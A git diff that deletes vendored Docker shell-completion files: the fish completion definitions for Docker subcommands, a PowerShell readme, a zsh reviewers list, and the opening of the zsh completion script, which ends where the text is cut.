-complete -c docker -A -f -n '__fish_seen_subcommand_from attach' -l sig-proxy -d 'Proxy all received signals to the process (non-TTY mode only). SIGCHLD, SIGKILL, and SIGSTOP are not proxied.'
-complete -c docker -A -f -n '__fish_seen_subcommand_from attach' -a '(__fish_print_docker_containers running)' -d "Container"
-
-# build
-complete -c docker -f -n '__fish_docker_no_subcommand' -a build -d 'Build an image from a Dockerfile'
-complete -c docker -A -f -n '__fish_seen_subcommand_from build' -s f -l file -d "Name of the Dockerfile(Default is 'Dockerfile' at context root)"
-complete -c docker -A -f -n '__fish_seen_subcommand_from build' -l force-rm -d 'Always remove intermediate containers, even after unsuccessful builds'
-complete -c docker -A -f -n '__fish_seen_subcommand_from build' -l help -d 'Print usage'
-complete -c docker -A -f -n '__fish_seen_subcommand_from build' -l no-cache -d 'Do not use cache when building the image'
-complete -c docker -A -f -n '__fish_seen_subcommand_from build' -l pull -d 'Always attempt to pull a newer version of the image'
-complete -c docker -A -f -n '__fish_seen_subcommand_from build' -s q -l quiet -d 'Suppress the build output and print image ID on success'
-complete -c docker -A -f -n '__fish_seen_subcommand_from build' -l rm -d 'Remove intermediate containers after a successful build'
-complete -c docker -A -f -n '__fish_seen_subcommand_from build' -s t -l tag -d 'Repository name (and optionally a tag) to be applied to the resulting image in case of success'
-
-# commit
-complete -c docker -f -n '__fish_docker_no_subcommand' -a commit -d "Create a new image from a container's changes"
-complete -c docker -A -f -n '__fish_seen_subcommand_from commit' -s a -l author -d 'Author (e.g., "John Hannibal Smith <hannibal@a-team.com>")'
-complete -c docker -A -f -n '__fish_seen_subcommand_from commit' -l help -d 'Print usage'
-complete -c docker -A -f -n '__fish_seen_subcommand_from commit' -s m -l message -d 'Commit message'
-complete -c docker -A -f -n '__fish_seen_subcommand_from commit' -s p -l pause -d 'Pause container during commit'
-complete -c docker -A -f -n '__fish_seen_subcommand_from commit' -a '(__fish_print_docker_containers all)' -d "Container"
-
-# cp
-complete -c docker -f -n '__fish_docker_no_subcommand' -a cp -d "Copy files/folders between a container and the local filesystem"
-complete -c docker -A -f -n '__fish_seen_subcommand_from cp' -l help -d 'Print usage'
-
-# create
-complete -c docker -f -n '__fish_docker_no_subcommand' -a create -d 'Create a new container'
-complete -c docker -A -f -n '__fish_seen_subcommand_from create' -s a -l attach -d 'Attach to STDIN, STDOUT or STDERR.'
-complete -c docker -A -f -n '__fish_seen_subcommand_from create' -l add-host -d 'Add a custom host-to-IP mapping (host:ip)'
-complete -c docker -A -f -n '__fish_seen_subcommand_from create' -l cpu-shares -d 'CPU shares (relative weight)'
-complete -c docker -A -f -n '__fish_seen_subcommand_from create' -l cap-add -d 'Add Linux capabilities'
-complete -c docker -A -f -n '__fish_seen_subcommand_from create' -l cap-drop -d 'Drop Linux capabilities'
-complete -c docker -A -f -n '__fish_seen_subcommand_from create' -l cidfile -d 'Write the container ID to the file'
-complete -c docker -A -f -n '__fish_seen_subcommand_from create' -l cpuset -d 'CPUs in which to allow execution (0-3, 0,1)'
-complete -c docker -A -f -n '__fish_seen_subcommand_from create' -l device -d 'Add a host device to the container (e.g. --device=/dev/sdc:/dev/xvdc:rwm)'
-complete -c docker -A -f -n '__fish_seen_subcommand_from create' -l dns -d 'Set custom DNS servers'
-complete -c docker -A -f -n '__fish_seen_subcommand_from create' -l dns-opt -d "Set custom DNS options (Use --dns-opt='' if you don't wish to set options)"
-complete -c docker -A -f -n '__fish_seen_subcommand_from create' -l dns-search -d "Set custom DNS search domains (Use --dns-search=. if you don't wish to set the search domain)"
-complete -c docker -A -f -n '__fish_seen_subcommand_from create' -s e -l env -d 'Set environment variables'
-complete -c docker -A -f -n '__fish_seen_subcommand_from create' -l entrypoint -d 'Overwrite the default ENTRYPOINT of the image'
-complete -c docker -A -f -n '__fish_seen_subcommand_from create' -l env-file -d 'Read in a line delimited file of environment variables'
-complete -c docker -A -f -n '__fish_seen_subcommand_from create' -l expose -d 'Expose a port or a range of ports (e.g. --expose=3300-3310) from the container without publishing it to your host'
-complete -c docker -A -f -n '__fish_seen_subcommand_from create' -l group-add -d 'Add additional groups to run as'
-complete -c docker -A -f -n '__fish_seen_subcommand_from create' -s h -l hostname -d 'Container host name'
-complete -c docker -A -f -n '__fish_seen_subcommand_from create' -l help -d 'Print usage'
-complete -c docker -A -f -n '__fish_seen_subcommand_from create' -s i -l interactive -d 'Keep STDIN open even if not attached'
-complete -c docker -A -f -n '__fish_seen_subcommand_from create' -l ipc -d 'Default is to create a private IPC namespace (POSIX SysV IPC) for the container'
-complete -c docker -A -f -n '__fish_seen_subcommand_from create' -l link -d 'Add link to another container in the form of <name|id>:alias'
-complete -c docker -A -f -n '__fish_seen_subcommand_from create' -s m -l memory -d 'Memory limit (format: <number>[<unit>], where unit = b, k, m or g)'
-complete -c docker -A -f -n '__fish_seen_subcommand_from create' -l mac-address -d 'Container MAC address (e.g. 92:d0:c6:0a:29:33)'
-complete -c docker -A -f -n '__fish_seen_subcommand_from create' -l memory-swap -d "Total memory usage (memory + swap), set '-1' to disable swap (format: <number>[<unit>], where unit = b, k, m or g)"
-complete -c docker -A -f -n '__fish_seen_subcommand_from create' -l name -d 'Assign a name to the container'
-complete -c docker -A -f -n '__fish_seen_subcommand_from create' -l net -d 'Set the Network mode for the container'
-complete -c docker -A -f -n '__fish_seen_subcommand_from create' -s P -l publish-all -d 'Publish all exposed ports to random ports on the host interfaces'
-complete -c docker -A -f -n '__fish_seen_subcommand_from create' -s p -l publish -d "Publish a container's port to the host"
-complete -c docker -A -f -n '__fish_seen_subcommand_from create' -l pid -d 'Default is to create a private PID namespace for the container'
-complete -c docker -A -f -n '__fish_seen_subcommand_from create' -l privileged -d 'Give extended privileges to this container'
-complete -c docker -A -f -n '__fish_seen_subcommand_from create' -l read-only -d "Mount the container's root filesystem as read only"
-complete -c docker -A -f -n '__fish_seen_subcommand_from create' -l restart -d 'Restart policy to apply when a container exits (no, on-failure[:max-retry], always)'
-complete -c docker -A -f -n '__fish_seen_subcommand_from create' -l security-opt -d 'Security Options'
-complete -c docker -A -f -n '__fish_seen_subcommand_from create' -s t -l tty -d 'Allocate a pseudo-TTY'
-complete -c docker -A -f -n '__fish_seen_subcommand_from create' -s u -l user -d 'Username or UID'
-complete -c docker -A -f -n '__fish_seen_subcommand_from create' -s v -l volume -d 'Bind mount a volume (e.g., from the host: -v /host:/container, from Docker: -v /container)'
-complete -c docker -A -f -n '__fish_seen_subcommand_from create' -l volumes-from -d 'Mount volumes from the specified container(s)'
-complete -c docker -A -f -n '__fish_seen_subcommand_from create' -s w -l workdir -d 'Working directory inside the container'
-complete -c docker -A -f -n '__fish_seen_subcommand_from create' -a '(__fish_print_docker_images)' -d "Image"
-
-# diff
-complete -c docker -f -n '__fish_docker_no_subcommand' -a diff -d "Inspect changes on a container's filesystem"
-complete -c docker -A -f -n '__fish_seen_subcommand_from diff' -l help -d 'Print usage'
-complete -c docker -A -f -n '__fish_seen_subcommand_from diff' -a '(__fish_print_docker_containers all)' -d "Container"
-
-# events
-complete -c docker -f -n '__fish_docker_no_subcommand' -a events -d 'Get real time events from the server'
-complete -c docker -A -f -n '__fish_seen_subcommand_from events' -s f -l filter -d "Provide filter values (i.e., 'event=stop')"
-complete -c docker -A -f -n '__fish_seen_subcommand_from events' -l help -d 'Print usage'
-complete -c docker -A -f -n '__fish_seen_subcommand_from events' -l since -d 'Show all events created since timestamp'
-complete -c docker -A -f -n '__fish_seen_subcommand_from events' -l until -d 'Stream events until this timestamp'
-complete -c docker -A -f -n '__fish_seen_subcommand_from events' -l format -d 'Format the output using the given go template'
-
-# exec
-complete -c docker -f -n '__fish_docker_no_subcommand' -a exec -d 'Run a command in a running container'
-complete -c docker -A -f -n '__fish_seen_subcommand_from exec' -s d -l detach -d 'Detached mode: run command in the background'
-complete -c docker -A -f -n '__fish_seen_subcommand_from exec' -l help -d 'Print usage'
-complete -c docker -A -f -n '__fish_seen_subcommand_from exec' -s i -l interactive -d 'Keep STDIN open even if not attached'
-complete -c docker -A -f -n '__fish_seen_subcommand_from exec' -s t -l tty -d 'Allocate a pseudo-TTY'
-complete -c docker -A -f -n '__fish_seen_subcommand_from exec' -a '(__fish_print_docker_containers running)' -d "Container"
-
-# export
-complete -c docker -f -n '__fish_docker_no_subcommand' -a export -d 'Stream the contents of a container as a tar archive'
-complete -c docker -A -f -n '__fish_seen_subcommand_from export' -l help -d 'Print usage'
-complete -c docker -A -f -n '__fish_seen_subcommand_from export' -a '(__fish_print_docker_containers all)' -d "Container"
-
-# history
-complete -c docker -f -n '__fish_docker_no_subcommand' -a history -d 'Show the history of an image'
-complete -c docker -A -f -n '__fish_seen_subcommand_from history' -l help -d 'Print usage'
-complete -c docker -A -f -n '__fish_seen_subcommand_from history' -l no-trunc -d "Don't truncate output"
-complete -c docker -A -f -n '__fish_seen_subcommand_from history' -s q -l quiet -d 'Only show numeric IDs'
-complete -c docker -A -f -n '__fish_seen_subcommand_from history' -a '(__fish_print_docker_images)' -d "Image"
-
-# images
-complete -c docker -f -n '__fish_docker_no_subcommand' -a images -d 'List images'
-complete -c docker -A -f -n '__fish_seen_subcommand_from images' -s a -l all -d 'Show all images (by default filter out the intermediate image layers)'
-complete -c docker -A -f -n '__fish_seen_subcommand_from images' -s f -l filter -d "Provide filter values (i.e., 'dangling=true')"
-complete -c docker -A -f -n '__fish_seen_subcommand_from images' -l help -d 'Print usage'
-complete -c docker -A -f -n '__fish_seen_subcommand_from images' -l no-trunc -d "Don't truncate output"
-complete -c docker -A -f -n '__fish_seen_subcommand_from images' -s q -l quiet -d 'Only show numeric IDs'
-complete -c docker -A -f -n '__fish_seen_subcommand_from images' -a '(__fish_print_docker_repositories)' -d "Repository"
-
-# import
-complete -c docker -f -n '__fish_docker_no_subcommand' -a import -d 'Create a new filesystem image from the contents of a tarball'
-complete -c docker -A -f -n '__fish_seen_subcommand_from import' -l help -d 'Print usage'
-
-# info
-complete -c docker -f -n '__fish_docker_no_subcommand' -a info -d 'Display system-wide information'
-complete -c docker -A -f -n '__fish_seen_subcommand_from info' -s f -l format  -d 'Format the output using the given go template'
-complete -c docker -A -f -n '__fish_seen_subcommand_from info' -l help -d 'Print usage'
-
-# inspect
-complete -c docker -f -n '__fish_docker_no_subcommand' -a inspect -d 'Return low-level information on a container or image'
-complete -c docker -A -f -n '__fish_seen_subcommand_from inspect' -s f -l format -d 'Format the output using the given go template.'
-complete -c docker -A -f -n '__fish_seen_subcommand_from inspect' -l help -d 'Print usage'
-complete -c docker -A -f -n '__fish_seen_subcommand_from inspect' -s s -l size -d 'Display total file sizes if the type is container.'
-complete -c docker -A -f -n '__fish_seen_subcommand_from inspect' -a '(__fish_print_docker_images)' -d "Image"
-complete -c docker -A -f -n '__fish_seen_subcommand_from inspect' -a '(__fish_print_docker_containers all)' -d "Container"
-
-# kill
-complete -c docker -f -n '__fish_docker_no_subcommand' -a kill -d 'Kill a running container'
-complete -c docker -A -f -n '__fish_seen_subcommand_from kill' -l help -d 'Print usage'
-complete -c docker -A -f -n '__fish_seen_subcommand_from kill' -s s -l signal -d 'Signal to send to the container'
-complete -c docker -A -f -n '__fish_seen_subcommand_from kill' -a '(__fish_print_docker_containers running)' -d "Container"
-
-# load
-complete -c docker -f -n '__fish_docker_no_subcommand' -a load -d 'Load an image from a tar archive'
-complete -c docker -A -f -n '__fish_seen_subcommand_from load' -l help -d 'Print usage'
-complete -c docker -A -f -n '__fish_seen_subcommand_from load' -s i -l input -d 'Read from a tar archive file, instead of STDIN'
-
-# login
-complete -c docker -f -n '__fish_docker_no_subcommand' -a login -d 'Log in to a Docker registry server'
-complete -c docker -A -f -n '__fish_seen_subcommand_from login' -l help -d 'Print usage'
-complete -c docker -A -f -n '__fish_seen_subcommand_from login' -s p -l password -d 'Password'
-complete -c docker -A -f -n '__fish_seen_subcommand_from login' -s u -l username -d 'Username'
-
-# logout
-complete -c docker -f -n '__fish_docker_no_subcommand' -a logout -d 'Log out from a Docker registry server'
-
-# logs
-complete -c docker -f -n '__fish_docker_no_subcommand' -a logs -d 'Fetch the logs of a container'
-complete -c docker -A -f -n '__fish_seen_subcommand_from logs' -s f -l follow -d 'Follow log output'
-complete -c docker -A -f -n '__fish_seen_subcommand_from logs' -l help -d 'Print usage'
-complete -c docker -A -f -n '__fish_seen_subcommand_from logs' -s t -l timestamps -d 'Show timestamps'
-complete -c docker -A -f -n '__fish_seen_subcommand_from logs' -l since -d 'Show logs since timestamp'
-complete -c docker -A -f -n '__fish_seen_subcommand_from logs' -l tail -d 'Output the specified number of lines at the end of logs (defaults to all logs)'
-complete -c docker -A -f -n '__fish_seen_subcommand_from logs' -a '(__fish_print_docker_containers running)' -d "Container"
-
-# port
-complete -c docker -f -n '__fish_docker_no_subcommand' -a port -d 'Lookup the public-facing port that is NAT-ed to PRIVATE_PORT'
-complete -c docker -A -f -n '__fish_seen_subcommand_from port' -l help -d 'Print usage'
-complete -c docker -A -f -n '__fish_seen_subcommand_from port' -a '(__fish_print_docker_containers running)' -d "Container"
-
-# pause
-complete -c docker -f -n '__fish_docker_no_subcommand' -a pause -d 'Pause all processes within a container'
-complete -c docker -A -f -n '__fish_seen_subcommand_from pause' -a '(__fish_print_docker_containers running)' -d "Container"
-
-# ps
-complete -c docker -f -n '__fish_docker_no_subcommand' -a ps -d 'List containers'
-complete -c docker -A -f -n '__fish_seen_subcommand_from ps' -s a -l all -d 'Show all containers. Only running containers are shown by default.'
-complete -c docker -A -f -n '__fish_seen_subcommand_from ps' -l before -d 'Show only container created before Id or Name, include non-running ones.'
-complete -c docker -A -f -n '__fish_seen_subcommand_from ps' -s f -l filter -d 'Provide filter values. Valid filters:'
-complete -c docker -A -f -n '__fish_seen_subcommand_from ps' -l help -d 'Print usage'
-complete -c docker -A -f -n '__fish_seen_subcommand_from ps' -s l -l latest -d 'Show only the latest created container, include non-running ones.'
-complete -c docker -A -f -n '__fish_seen_subcommand_from ps' -s n -d 'Show n last created containers, include non-running ones.'
-complete -c docker -A -f -n '__fish_seen_subcommand_from ps' -l no-trunc -d "Don't truncate output"
-complete -c docker -A -f -n '__fish_seen_subcommand_from ps' -s q -l quiet -d 'Only display numeric IDs'
-complete -c docker -A -f -n '__fish_seen_subcommand_from ps' -s s -l size -d 'Display total file sizes'
-complete -c docker -A -f -n '__fish_seen_subcommand_from ps' -l since -d 'Show only containers created since Id or Name, include non-running ones.'
-
-# pull
-complete -c docker -f -n '__fish_docker_no_subcommand' -a pull -d 'Pull an image or a repository from a Docker registry server'
-complete -c docker -A -f -n '__fish_seen_subcommand_from pull' -s a -l all-tags -d 'Download all tagged images in the repository'
-complete -c docker -A -f -n '__fish_seen_subcommand_from pull' -l help -d 'Print usage'
-complete -c docker -A -f -n '__fish_seen_subcommand_from pull' -a '(__fish_print_docker_images)' -d "Image"
-complete -c docker -A -f -n '__fish_seen_subcommand_from pull' -a '(__fish_print_docker_repositories)' -d "Repository"
-
-# push
-complete -c docker -f -n '__fish_docker_no_subcommand' -a push -d 'Push an image or a repository to a Docker registry server'
-complete -c docker -A -f -n '__fish_seen_subcommand_from push' -l help -d 'Print usage'
-complete -c docker -A -f -n '__fish_seen_subcommand_from push' -a '(__fish_print_docker_images)' -d "Image"
-complete -c docker -A -f -n '__fish_seen_subcommand_from push' -a '(__fish_print_docker_repositories)' -d "Repository"
-
-# rename
-complete -c docker -f -n '__fish_docker_no_subcommand' -a rename -d 'Rename an existing container'
-
-# restart
-complete -c docker -f -n '__fish_docker_no_subcommand' -a restart -d 'Restart a container'
-complete -c docker -A -f -n '__fish_seen_subcommand_from restart' -l help -d 'Print usage'
-complete -c docker -A -f -n '__fish_seen_subcommand_from restart' -s t -l time -d 'Number of seconds to try to stop for before killing the container. Once killed it will then be restarted. Default is 10 seconds.'
-complete -c docker -A -f -n '__fish_seen_subcommand_from restart' -a '(__fish_print_docker_containers running)' -d "Container"
-
-# rm
-complete -c docker -f -n '__fish_docker_no_subcommand' -a rm -d 'Remove one or more containers'
-complete -c docker -A -f -n '__fish_seen_subcommand_from rm' -s f -l force -d 'Force the removal of a running container (uses SIGKILL)'
-complete -c docker -A -f -n '__fish_seen_subcommand_from rm' -l help -d 'Print usage'
-complete -c docker -A -f -n '__fish_seen_subcommand_from rm' -s l -l link -d 'Remove the specified link and not the underlying container'
-complete -c docker -A -f -n '__fish_seen_subcommand_from rm' -s v -l volumes -d 'Remove the volumes associated with the container'
-complete -c docker -A -f -n '__fish_seen_subcommand_from rm' -a '(__fish_print_docker_containers stopped)' -d "Container"
-complete -c docker -A -f -n '__fish_seen_subcommand_from rm' -s f -l force -a '(__fish_print_docker_containers all)' -d "Container"
-
-# rmi
-complete -c docker -f -n '__fish_docker_no_subcommand' -a rmi -d 'Remove one or more images'
-complete -c docker -A -f -n '__fish_seen_subcommand_from rmi' -s f -l force -d 'Force removal of the image'
-complete -c docker -A -f -n '__fish_seen_subcommand_from rmi' -l help -d 'Print usage'
-complete -c docker -A -f -n '__fish_seen_subcommand_from rmi' -l no-prune -d 'Do not delete untagged parents'
-complete -c docker -A -f -n '__fish_seen_subcommand_from rmi' -a '(__fish_print_docker_images)' -d "Image"
-
-# run
-complete -c docker -f -n '__fish_docker_no_subcommand' -a run -d 'Run a command in a new container'
-complete -c docker -A -f -n '__fish_seen_subcommand_from run' -s a -l attach -d 'Attach to STDIN, STDOUT or STDERR.'
-complete -c docker -A -f -n '__fish_seen_subcommand_from run' -l add-host -d 'Add a custom host-to-IP mapping (host:ip)'
-complete -c docker -A -f -n '__fish_seen_subcommand_from run' -s c -l cpu-shares -d 'CPU shares (relative weight)'
-complete -c docker -A -f -n '__fish_seen_subcommand_from run' -l cap-add -d 'Add Linux capabilities'
-complete -c docker -A -f -n '__fish_seen_subcommand_from run' -l cap-drop -d 'Drop Linux capabilities'
-complete -c docker -A -f -n '__fish_seen_subcommand_from run' -l cidfile -d 'Write the container ID to the file'
-complete -c docker -A -f -n '__fish_seen_subcommand_from run' -l cpuset -d 'CPUs in which to allow execution (0-3, 0,1)'
-complete -c docker -A -f -n '__fish_seen_subcommand_from run' -s d -l detach -d 'Detached mode: run the container in the background and print the new container ID'
-complete -c docker -A -f -n '__fish_seen_subcommand_from run' -l device -d 'Add a host device to the container (e.g. --device=/dev/sdc:/dev/xvdc:rwm)'
-complete -c docker -A -f -n '__fish_seen_subcommand_from run' -l dns -d 'Set custom DNS servers'
-complete -c docker -A -f -n '__fish_seen_subcommand_from run' -l dns-opt -d "Set custom DNS options (Use --dns-opt='' if you don't wish to set options)"
-complete -c docker -A -f -n '__fish_seen_subcommand_from run' -l dns-search -d "Set custom DNS search domains (Use --dns-search=. if you don't wish to set the search domain)"
-complete -c docker -A -f -n '__fish_seen_subcommand_from run' -s e -l env -d 'Set environment variables'
-complete -c docker -A -f -n '__fish_seen_subcommand_from run' -l entrypoint -d 'Overwrite the default ENTRYPOINT of the image'
-complete -c docker -A -f -n '__fish_seen_subcommand_from run' -l env-file -d 'Read in a line delimited file of environment variables'
-complete -c docker -A -f -n '__fish_seen_subcommand_from run' -l expose -d 'Expose a port or a range of ports (e.g. --expose=3300-3310) from the container without publishing it to your host'
-complete -c docker -A -f -n '__fish_seen_subcommand_from create' -l group-add -d 'Add additional groups to run as'
-complete -c docker -A -f -n '__fish_seen_subcommand_from run' -s h -l hostname -d 'Container host name'
-complete -c docker -A -f -n '__fish_seen_subcommand_from run' -l help -d 'Print usage'
-complete -c docker -A -f -n '__fish_seen_subcommand_from run' -s i -l interactive -d 'Keep STDIN open even if not attached'
-complete -c docker -A -f -n '__fish_seen_subcommand_from run' -l ipc -d 'Default is to create a private IPC namespace (POSIX SysV IPC) for the container'
-complete -c docker -A -f -n '__fish_seen_subcommand_from run' -l link -d 'Add link to another container in the form of <name|id>:alias'
-complete -c docker -A -f -n '__fish_seen_subcommand_from run' -s m -l memory -d 'Memory limit (format: <number>[<unit>], where unit = b, k, m or g)'
-complete -c docker -A -f -n '__fish_seen_subcommand_from run' -l mac-address -d 'Container MAC address (e.g. 92:d0:c6:0a:29:33)'
-complete -c docker -A -f -n '__fish_seen_subcommand_from run' -l memory-swap -d "Total memory usage (memory + swap), set '-1' to disable swap (format: <number>[<unit>], where unit = b, k, m or g)"
-complete -c docker -A -f -n '__fish_seen_subcommand_from run' -l name -d 'Assign a name to the container'
-complete -c docker -A -f -n '__fish_seen_subcommand_from run' -l net -d 'Set the Network mode for the container'
-complete -c docker -A -f -n '__fish_seen_subcommand_from run' -s P -l publish-all -d 'Publish all exposed ports to random ports on the host interfaces'
-complete -c docker -A -f -n '__fish_seen_subcommand_from run' -s p -l publish -d "Publish a container's port to the host"
-complete -c docker -A -f -n '__fish_seen_subcommand_from run' -l pid -d 'Default is to create a private PID namespace for the container'
-complete -c docker -A -f -n '__fish_seen_subcommand_from run' -l privileged -d 'Give extended privileges to this container'
-complete -c docker -A -f -n '__fish_seen_subcommand_from run' -l read-only -d "Mount the container's root filesystem as read only"
-complete -c docker -A -f -n '__fish_seen_subcommand_from run' -l restart -d 'Restart policy to apply when a container exits (no, on-failure[:max-retry], always)'
-complete -c docker -A -f -n '__fish_seen_subcommand_from run' -l rm -d 'Automatically remove the container when it exits (incompatible with -d)'
-complete -c docker -A -f -n '__fish_seen_subcommand_from run' -l security-opt -d 'Security Options'
-complete -c docker -A -f -n '__fish_seen_subcommand_from run' -l sig-proxy -d 'Proxy received signals to the process (non-TTY mode only). SIGCHLD, SIGSTOP, and SIGKILL are not proxied.'
-complete -c docker -A -f -n '__fish_seen_subcommand_from run' -l stop-signal -d 'Signal to kill a container'
-complete -c docker -A -f -n '__fish_seen_subcommand_from run' -s t -l tty -d 'Allocate a pseudo-TTY'
-complete -c docker -A -f -n '__fish_seen_subcommand_from run' -s u -l user -d 'Username or UID'
-complete -c docker -A -f -n '__fish_seen_subcommand_from run' -l tmpfs -d 'Mount tmpfs on a directory'
-complete -c docker -A -f -n '__fish_seen_subcommand_from run' -s v -l volume -d 'Bind mount a volume (e.g., from the host: -v /host:/container, from Docker: -v /container)'
-complete -c docker -A -f -n '__fish_seen_subcommand_from run' -l volumes-from -d 'Mount volumes from the specified container(s)'
-complete -c docker -A -f -n '__fish_seen_subcommand_from run' -s w -l workdir -d 'Working directory inside the container'
-complete -c docker -A -f -n '__fish_seen_subcommand_from run' -a '(__fish_print_docker_images)' -d "Image"
-
-# save
-complete -c docker -f -n '__fish_docker_no_subcommand' -a save -d 'Save an image to a tar archive'
-complete -c docker -A -f -n '__fish_seen_subcommand_from save' -l help -d 'Print usage'
-complete -c docker -A -f -n '__fish_seen_subcommand_from save' -s o -l output -d 'Write to an file, instead of STDOUT'
-complete -c docker -A -f -n '__fish_seen_subcommand_from save' -a '(__fish_print_docker_images)' -d "Image"
-
-# search
-complete -c docker -f -n '__fish_docker_no_subcommand' -a search -d 'Search for an image on the registry (defaults to the Docker Hub)'
-complete -c docker -A -f -n '__fish_seen_subcommand_from search' -l automated -d 'Only show automated builds'
-complete -c docker -A -f -n '__fish_seen_subcommand_from search' -l help -d 'Print usage'
-complete -c docker -A -f -n '__fish_seen_subcommand_from search' -l no-trunc -d "Don't truncate output"
-complete -c docker -A -f -n '__fish_seen_subcommand_from search' -s s -l stars -d 'Only displays with at least x stars'
-
-# start
-complete -c docker -f -n '__fish_docker_no_subcommand' -a start -d 'Start a container'
-complete -c docker -A -f -n '__fish_seen_subcommand_from start' -s a -l attach -d "Attach container's STDOUT and STDERR and forward all signals to the process"
-complete -c docker -A -f -n '__fish_seen_subcommand_from start' -l help -d 'Print usage'
-complete -c docker -A -f -n '__fish_seen_subcommand_from start' -s i -l interactive -d "Attach container's STDIN"
-complete -c docker -A -f -n '__fish_seen_subcommand_from start' -a '(__fish_print_docker_containers stopped)' -d "Container"
-
-# stats
-complete -c docker -f -n '__fish_docker_no_subcommand' -a stats -d "Display a live stream of one or more containers' resource usage statistics"
-complete -c docker -A -f -n '__fish_seen_subcommand_from stats' -l help -d 'Print usage'
-complete -c docker -A -f -n '__fish_seen_subcommand_from stats' -l no-stream -d 'Disable streaming stats and only pull the first result'
-complete -c docker -A -f -n '__fish_seen_subcommand_from stats' -a '(__fish_print_docker_containers running)' -d "Container"
-
-# stop
-complete -c docker -f -n '__fish_docker_no_subcommand' -a stop -d 'Stop a container'
-complete -c docker -A -f -n '__fish_seen_subcommand_from stop' -l help -d 'Print usage'
-complete -c docker -A -f -n '__fish_seen_subcommand_from stop' -s t -l time -d 'Number of seconds to wait for the container to stop before killing it. Default is 10 seconds.'
-complete -c docker -A -f -n '__fish_seen_subcommand_from stop' -a '(__fish_print_docker_containers running)' -d "Container"
-
-# tag
-complete -c docker -f -n '__fish_docker_no_subcommand' -a tag -d 'Tag an image into a repository'
-complete -c docker -A -f -n '__fish_seen_subcommand_from tag' -s f -l force -d 'Force'
-complete -c docker -A -f -n '__fish_seen_subcommand_from tag' -l help -d 'Print usage'
-
-# top
-complete -c docker -f -n '__fish_docker_no_subcommand' -a top -d 'Lookup the running processes of a container'
-complete -c docker -A -f -n '__fish_seen_subcommand_from top' -l help -d 'Print usage'
-complete -c docker -A -f -n '__fish_seen_subcommand_from top' -a '(__fish_print_docker_containers running)' -d "Container"
-
-# unpause
-complete -c docker -f -n '__fish_docker_no_subcommand' -a unpause -d 'Unpause a paused container'
-complete -c docker -A -f -n '__fish_seen_subcommand_from unpause' -a '(__fish_print_docker_containers running)' -d "Container"
-
-# version
-complete -c docker -f -n '__fish_docker_no_subcommand' -a version -d 'Show the Docker version information'
-complete -c docker -A -f -n '__fish_seen_subcommand_from version' -s f -l format  -d 'Format the output using the given go template'
-complete -c docker -A -f -n '__fish_seen_subcommand_from version' -l help -d 'Print usage'
-
-# wait
-complete -c docker -f -n '__fish_docker_no_subcommand' -a wait -d 'Block until a container stops, then print its exit code'
-complete -c docker -A -f -n '__fish_seen_subcommand_from wait' -l help -d 'Print usage'
-complete -c docker -A -f -n '__fish_seen_subcommand_from wait' -a '(__fish_print_docker_containers running)' -d "Container"
diff --git a/vendor/github.com/docker/docker/contrib/completion/powershell/readme.txt b/vendor/github.com/docker/docker/contrib/completion/powershell/readme.txt
deleted file mode 100644
index 18e1b53c13..0000000000
--- a/vendor/github.com/docker/docker/contrib/completion/powershell/readme.txt
+++ /dev/null
@@ -1 +0,0 @@
-See https://github.com/samneirinck/posh-docker
\ No newline at end of file
diff --git a/vendor/github.com/docker/docker/contrib/completion/zsh/REVIEWERS b/vendor/github.com/docker/docker/contrib/completion/zsh/REVIEWERS
deleted file mode 100644
index 03ee2dde3d..0000000000
--- a/vendor/github.com/docker/docker/contrib/completion/zsh/REVIEWERS
+++ /dev/null
@@ -1,2 +0,0 @@
-Tianon Gravi <admwiggin@gmail.com> (@tianon)
-Jessie Frazelle <jess@docker.com> (@jfrazelle)
diff --git a/vendor/github.com/docker/docker/contrib/completion/zsh/_docker b/vendor/github.com/docker/docker/contrib/completion/zsh/_docker
deleted file mode 100644
index ecae826a4a..0000000000
--- a/vendor/github.com/docker/docker/contrib/completion/zsh/_docker
+++ /dev/null
@@ -1,2787 +0,0 @@
-#compdef docker dockerd
-#
-# zsh completion for docker (http://docker.com)
-#
-# version:  0.3.0
-# github:   https://github.com/felixr/docker-zsh-completion
-#
-# contributors:
-#   - Felix Riedel
-#   - Steve Durrheimer
-#   - Vincent Bernat
-#
-# license:
-#
-# Copyright (c) 2013, Felix Riedel
-# All rights reserved.
-#
-# Redistribution and use in source and binary forms, with or without
-# modification, are permitted provided that the following conditions are met:
-#     * Redistributions of source code must retain the above copyright
-#       notice, this list of conditions and the following disclaimer.
-#     * Redistributions in binary form must reproduce the above copyright
-#       notice, this list of conditions and the following disclaimer in the
-#       documentation and/or other materials provided with the distribution.
-#     * Neither the name of the <organization> nor the
-#       names of its contributors may be used to endorse or promote products
-#       derived from this software without specific prior written permission.
-#
-# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND
-# ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED
-# WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
-# DISCLAIMED. IN NO EVENT SHALL <COPYRIGHT HOLDER> BE LIABLE FOR ANY
-# DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES
-# (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;
-# LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND
-# ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
-# (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS
-# SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
-#
-
-# Short-option stacking can be enabled with:
-#  zstyle ':completion:*:*:docker:*' option-stacking yes
-#  zstyle ':completion:*:*:docker-*:*' option-stacking yes
-__docker_arguments() {
-    if zstyle -t ":completion:${curcontext}:" option-stacking; then
-        print -- -s
-    fi
-}
-
-__docker_get_containers() {
-    [[ $PREFIX = -* ]] && return 1
-    integer ret=1
-    local kind type line s
-    declare -a running stopped lines args names
-
-    kind=$1; shift
-    type=$1; shift
-    [[ $kind = (stopped|all) ]] && args=($args -a)
-
-    lines=(${(f)${:-"$(_call_program commands docker $docker_options ps --format 'table' --no-trunc $args)"$'\n'}})
-
-    # Parse header line to find columns
-    local i=1 j=1 k header=${lines[1]}
-    declare -A begin end
-    while (( j < ${#header} - 1 )); do
